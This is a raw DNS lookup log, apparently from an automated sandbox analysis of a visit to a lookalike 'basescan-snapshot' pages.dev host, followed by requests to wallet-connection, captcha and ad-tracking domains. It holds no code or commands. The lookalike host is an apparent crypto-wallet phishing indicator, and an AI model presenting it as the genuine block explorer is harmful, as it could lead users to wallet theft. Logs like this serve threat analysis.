                                                                                                                                                                                                                                              Sep 28, 2024 03:17:02.852235079 CEST192.168.2.51.1.1.10x62d9Standard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:02.852413893 CEST192.168.2.51.1.1.10xcea5Standard query (0)cdn.ethers.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:02.874911070 CEST192.168.2.51.1.1.10x4ef6Standard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:05.093137026 CEST192.168.2.51.1.1.10x8447Standard query (0)js.hcaptcha.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:05.093491077 CEST192.168.2.51.1.1.10x8c36Standard query (0)js.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:06.048736095 CEST192.168.2.51.1.1.10xc1a1Standard query (0)newassets.hcaptcha.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:06.048918962 CEST192.168.2.51.1.1.10x3735Standard query (0)newassets.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:06.074882030 CEST192.168.2.51.1.1.10x5848Standard query (0)js.hcaptcha.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:06.075146914 CEST192.168.2.51.1.1.10x3890Standard query (0)js.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:06.241936922 CEST192.168.2.51.1.1.10x758aStandard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:06.242082119 CEST192.168.2.51.1.1.10x9870Standard query (0)cdn.ethers.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.043721914 CEST192.168.2.51.1.1.10x8b0cStandard query (0)api.hcaptcha.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.044020891 CEST192.168.2.51.1.1.10xfec4Standard query (0)api.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.134953976 CEST192.168.2.51.1.1.10xda5aStandard query (0)adssistem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.135121107 CEST192.168.2.51.1.1.10x6563Standard query (0)adssistem.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.148650885 CEST192.168.2.51.1.1.10x6868Standard query (0)s2.adform.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.148792028 CEST192.168.2.51.1.1.10x9c9bStandard query (0)s2.adform.net65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.150397062 CEST192.168.2.51.1.1.10x1bc4Standard query (0)event.getblue.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.150593996 CEST192.168.2.51.1.1.10xfa74Standard query (0)event.getblue.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.151815891 CEST192.168.2.51.1.1.10x626bStandard query (0)pubads.g.doubleclick.uk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.152118921 CEST192.168.2.51.1.1.10x6bb0Standard query (0)pubads.g.doubleclick.uk.net65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.157180071 CEST192.168.2.51.1.1.10xd769Standard query (0)scripts.prdredir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.157310963 CEST192.168.2.51.1.1.10xa5b6Standard query (0)scripts.prdredir.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.158099890 CEST192.168.2.51.1.1.10x6ea3Standard query (0)rtgio.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.158556938 CEST192.168.2.51.1.1.10x8c72Standard query (0)rtgio.co65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.159123898 CEST192.168.2.51.1.1.10x8385Standard query (0)js.sentry-cdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.159425974 CEST192.168.2.51.1.1.10x3e1fStandard query (0)js.sentry-cdn.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.161719084 CEST192.168.2.51.1.1.10x8c4fStandard query (0)scripts.mediamathrdrt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.161849022 CEST192.168.2.51.1.1.10x599fStandard query (0)scripts.mediamathrdrt.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.162209988 CEST192.168.2.51.1.1.10x733Standard query (0)pixel-us.convertagain.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:08.162415981 CEST192.168.2.51.1.1.10x31fStandard query (0)pixel-us.convertagain.net65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.633189917 CEST192.168.2.51.1.1.10xa51Standard query (0)my.rtmark.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.633403063 CEST192.168.2.51.1.1.10xea23Standard query (0)my.rtmark.net65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.696883917 CEST192.168.2.51.1.1.10x47ebStandard query (0)metrics.aimetric.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.697568893 CEST192.168.2.51.1.1.10x92d3Standard query (0)metrics.aimetric.net65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.714063883 CEST192.168.2.51.1.1.10xe3beStandard query (0)tracking.aimetric.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.714142084 CEST192.168.2.51.1.1.10xa0d3Standard query (0)tracking.aimetric.net65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.771855116 CEST192.168.2.51.1.1.10xaacaStandard query (0)pixel.prdredir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.771997929 CEST192.168.2.51.1.1.10xe9eStandard query (0)pixel.prdredir.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.897376060 CEST192.168.2.51.1.1.10xc708Standard query (0)event.getblue.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.897470951 CEST192.168.2.51.1.1.10xcd38Standard query (0)event.getblue.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.931927919 CEST192.168.2.51.1.1.10xbfdbStandard query (0)widget.getblue.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.932178020 CEST192.168.2.51.1.1.10xd42dStandard query (0)widget.getblue.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.932630062 CEST192.168.2.51.1.1.10xde4bStandard query (0)a1.adform.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:09.932914019 CEST192.168.2.51.1.1.10x4a67Standard query (0)a1.adform.net65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.001662970 CEST192.168.2.51.1.1.10xd65dStandard query (0)pixel-us.convertagain.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.002051115 CEST192.168.2.51.1.1.10x86abStandard query (0)pixel-us.convertagain.net65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.004944086 CEST192.168.2.51.1.1.10x6be7Standard query (0)api.hcaptcha.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.005119085 CEST192.168.2.51.1.1.10xc48cStandard query (0)api.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.008627892 CEST192.168.2.51.1.1.10x8ab3Standard query (0)scripts.prdredir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.008744001 CEST192.168.2.51.1.1.10x3949Standard query (0)scripts.prdredir.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.010376930 CEST192.168.2.51.1.1.10x291aStandard query (0)js.sentry-cdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.010763884 CEST192.168.2.51.1.1.10xcde4Standard query (0)js.sentry-cdn.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.025389910 CEST192.168.2.51.1.1.10xb257Standard query (0)event.getblue.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.025609016 CEST192.168.2.51.1.1.10xc94cStandard query (0)event.getblue.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.027905941 CEST192.168.2.51.1.1.10x8129Standard query (0)s2.adform.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.027905941 CEST192.168.2.51.1.1.10xd14aStandard query (0)s2.adform.net65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.103404999 CEST192.168.2.51.1.1.10x1816Standard query (0)adssistem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.103646040 CEST192.168.2.51.1.1.10xbfaeStandard query (0)adssistem.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.142357111 CEST192.168.2.51.1.1.10xc80dStandard query (0)insights.rtgio.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.142443895 CEST192.168.2.51.1.1.10x3b2bStandard query (0)insights.rtgio.co65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.190043926 CEST192.168.2.51.1.1.10xfe3eStandard query (0)rtgio.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.190197945 CEST192.168.2.51.1.1.10x320Standard query (0)rtgio.co65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.211368084 CEST192.168.2.51.1.1.10x150dStandard query (0)pubads.g.doubleclick.uk.net65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.211368084 CEST192.168.2.51.1.1.10x2342Standard query (0)pubads.g.doubleclick.uk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.367101908 CEST192.168.2.51.1.1.10x1662Standard query (0)pixel.mediamathrdrt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.367317915 CEST192.168.2.51.1.1.10x6691Standard query (0)pixel.mediamathrdrt.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.374262094 CEST192.168.2.51.1.1.10xaedStandard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.374485016 CEST192.168.2.51.1.1.10x2654Standard query (0)cdn.ethers.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.395891905 CEST192.168.2.51.1.1.10x13b8Standard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.404427052 CEST192.168.2.51.1.1.10x7365Standard query (0)scripts.mediamathrdrt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.404653072 CEST192.168.2.51.1.1.10xe07Standard query (0)scripts.mediamathrdrt.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.570162058 CEST192.168.2.51.1.1.10xcd1fStandard query (0)pixel.prdredir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.571408033 CEST192.168.2.51.1.1.10x2c2Standard query (0)pixel.prdredir.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.594675064 CEST192.168.2.51.1.1.10x700eStandard query (0)my.rtmark.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.594675064 CEST192.168.2.51.1.1.10xb15eStandard query (0)my.rtmark.net65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.881850004 CEST192.168.2.51.1.1.10xd08dStandard query (0)tracking.aimetric.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.882219076 CEST192.168.2.51.1.1.10xd6fStandard query (0)tracking.aimetric.net65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.969702005 CEST192.168.2.51.1.1.10x5350Standard query (0)newassets.hcaptcha.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:10.969926119 CEST192.168.2.51.1.1.10x900eStandard query (0)newassets.hcaptcha.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.124924898 CEST192.168.2.51.1.1.10x1d28Standard query (0)ib.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.125176907 CEST192.168.2.51.1.1.10xa6a8Standard query (0)ib.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.162018061 CEST192.168.2.51.1.1.10xd908Standard query (0)cm.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.162422895 CEST192.168.2.51.1.1.10x2c01Standard query (0)cm.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.196636915 CEST192.168.2.51.1.1.10x2ccdStandard query (0)widget.getblue.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.197006941 CEST192.168.2.51.1.1.10x5524Standard query (0)widget.getblue.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.340627909 CEST192.168.2.51.1.1.10x452Standard query (0)insights.rtgio.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.340941906 CEST192.168.2.51.1.1.10xd9bbStandard query (0)insights.rtgio.co65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.502608061 CEST192.168.2.51.1.1.10xc7ceStandard query (0)pixel.mediamathrdrt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.502907038 CEST192.168.2.51.1.1.10x6caStandard query (0)pixel.mediamathrdrt.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.864782095 CEST192.168.2.51.1.1.10x7b39Standard query (0)a1.adform.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:11.864888906 CEST192.168.2.51.1.1.10x923cStandard query (0)a1.adform.net65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:13.019121885 CEST192.168.2.51.1.1.10x2810Standard query (0)cms.getblue.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:13.019121885 CEST192.168.2.51.1.1.10x8c93Standard query (0)cms.getblue.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:13.021001101 CEST192.168.2.51.1.1.10x82fbStandard query (0)ib.adnxs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:13.021218061 CEST192.168.2.51.1.1.10xf566Standard query (0)ib.adnxs.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:14.343748093 CEST192.168.2.51.1.1.10xdf99Standard query (0)cdn.ethers.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:14.343748093 CEST192.168.2.51.1.1.10x9eeeStandard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:14.413644075 CEST192.168.2.51.1.1.10x2104Standard query (0)cms.getblue.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:14.413878918 CEST192.168.2.51.1.1.10x3a35Standard query (0)cms.getblue.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:16.783761024 CEST192.168.2.51.1.1.10x814Standard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:16.783915997 CEST192.168.2.51.1.1.10xa262Standard query (0)cdn.ethers.io65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:17:16.801954985 CEST192.168.2.51.1.1.10xbe3eStandard query (0)cdn.ethers.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:52.157768965 CEST1.1.1.1192.168.2.50xb4beNo error (0)basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:52.157794952 CEST1.1.1.1192.168.2.50x234aNo error (0)basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev172.66.47.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:52.157794952 CEST1.1.1.1192.168.2.50x234aNo error (0)basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev172.66.44.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:52.171466112 CEST1.1.1.1192.168.2.50x1623No error (0)basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:52.171952963 CEST1.1.1.1192.168.2.50xec27No error (0)basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev172.66.47.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:52.171952963 CEST1.1.1.1192.168.2.50xec27No error (0)basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev172.66.44.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:53.434681892 CEST1.1.1.1192.168.2.50x1ca2No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:53.434698105 CEST1.1.1.1192.168.2.50x905fNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:53.434698105 CEST1.1.1.1192.168.2.50x905fNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:54.419148922 CEST1.1.1.1192.168.2.50x9c3No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:54.419148922 CEST1.1.1.1192.168.2.50x9c3No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:54.419181108 CEST1.1.1.1192.168.2.50x6279No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:55.059504986 CEST1.1.1.1192.168.2.50x12beNo error (0)www.google.com142.250.184.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:55.060760975 CEST1.1.1.1192.168.2.50xdc89No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:56.861766100 CEST1.1.1.1192.168.2.50xda7bNo error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:56.861826897 CEST1.1.1.1192.168.2.50x652dNo error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:58.473099947 CEST1.1.1.1192.168.2.50x84d6No error (0)cdn.jsdelivr.netcdn.jsdelivr.net.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:58.473143101 CEST1.1.1.1192.168.2.50x2b6fNo error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:58.473143101 CEST1.1.1.1192.168.2.50x2b6fNo error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:58.473143101 CEST1.1.1.1192.168.2.50x2b6fNo error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:58.473143101 CEST1.1.1.1192.168.2.50x2b6fNo error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:58.473143101 CEST1.1.1.1192.168.2.50x2b6fNo error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:58.757107019 CEST1.1.1.1192.168.2.50x22a2Name error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:58.800045013 CEST1.1.1.1192.168.2.50xa038Name error (3)cdn.ethers.iononenone65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:15:58.838790894 CEST1.1.1.1192.168.2.50x6fcdName error (3)cdn.ethers.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:00.047775030 CEST1.1.1.1192.168.2.50xfb77No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:00.056277037 CEST1.1.1.1192.168.2.50x2d4fNo error (0)basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:00.057638884 CEST1.1.1.1192.168.2.50x4637No error (0)basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev172.66.44.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:00.057638884 CEST1.1.1.1192.168.2.50x4637No error (0)basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev172.66.47.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:01.146600008 CEST1.1.1.1192.168.2.50x12feNo error (0)basescan.org104.26.13.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:01.146600008 CEST1.1.1.1192.168.2.50x12feNo error (0)basescan.org172.67.75.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:01.146600008 CEST1.1.1.1192.168.2.50x12feNo error (0)basescan.org104.26.12.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:01.148399115 CEST1.1.1.1192.168.2.50xfd8fNo error (0)basescan.org65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:02.862385035 CEST1.1.1.1192.168.2.50x6041No error (0)www.walletlink.org104.18.37.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:02.862385035 CEST1.1.1.1192.168.2.50x6041No error (0)www.walletlink.org172.64.150.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:02.867659092 CEST1.1.1.1192.168.2.50x6895No error (0)api.web3modal.com104.18.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:02.867659092 CEST1.1.1.1192.168.2.50x6895No error (0)api.web3modal.com104.18.28.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:02.870435953 CEST1.1.1.1192.168.2.50xf889No error (0)api.web3modal.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:03.218158007 CEST1.1.1.1192.168.2.50x5baNo error (0)relay.walletconnect.com3.66.52.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:03.218158007 CEST1.1.1.1192.168.2.50x5baNo error (0)relay.walletconnect.com3.124.182.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:03.218158007 CEST1.1.1.1192.168.2.50x5baNo error (0)relay.walletconnect.com3.73.141.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:03.470339060 CEST1.1.1.1192.168.2.50x3f76No error (0)eas.etherscan.com172.67.69.250A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:03.470339060 CEST1.1.1.1192.168.2.50x3f76No error (0)eas.etherscan.com104.26.8.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:03.470339060 CEST1.1.1.1192.168.2.50x3f76No error (0)eas.etherscan.com104.26.9.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:03.472826958 CEST1.1.1.1192.168.2.50xdff2No error (0)eas.etherscan.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:03.472851992 CEST1.1.1.1192.168.2.50x1f05No error (0)api.hypelab.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:03.472851992 CEST1.1.1.1192.168.2.50x1f05No error (0)api.hypelab.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:03.474888086 CEST1.1.1.1192.168.2.50x338aNo error (0)api.hypelab.com65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:04.395207882 CEST1.1.1.1192.168.2.50x6371No error (0)basescan.org104.26.12.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:04.395207882 CEST1.1.1.1192.168.2.50x6371No error (0)basescan.org172.67.75.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:04.395207882 CEST1.1.1.1192.168.2.50x6371No error (0)basescan.org104.26.13.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:04.403610945 CEST1.1.1.1192.168.2.50xfe4aNo error (0)basescan.org65IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:04.556356907 CEST1.1.1.1192.168.2.50xe1bcNo error (0)relay.walletconnect.org3.126.230.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:04.556356907 CEST1.1.1.1192.168.2.50xe1bcNo error (0)relay.walletconnect.org3.75.40.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:04.556356907 CEST1.1.1.1192.168.2.50xe1bcNo error (0)relay.walletconnect.org18.159.147.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:05.957683086 CEST1.1.1.1192.168.2.50x1ed2No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:05.957683086 CEST1.1.1.1192.168.2.50x1ed2No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:06.395446062 CEST1.1.1.1192.168.2.50x22aaNo error (0)api.web3modal.com104.18.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:06.395446062 CEST1.1.1.1192.168.2.50x22aaNo error (0)api.web3modal.com104.18.28.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:06.396143913 CEST1.1.1.1192.168.2.50x815eNo error (0)d107ul3j3wrui0.cloudfront.net143.204.205.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:06.396143913 CEST1.1.1.1192.168.2.50x815eNo error (0)d107ul3j3wrui0.cloudfront.net143.204.205.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                              Sep 28, 2024 03:16:06.396143913 CEST1.1.1.1192.168.2.50x815eNo error (0)d107ul3j3wrui0.cloudfront.net143.204.205.115A (IP address)IN (0x0001)false
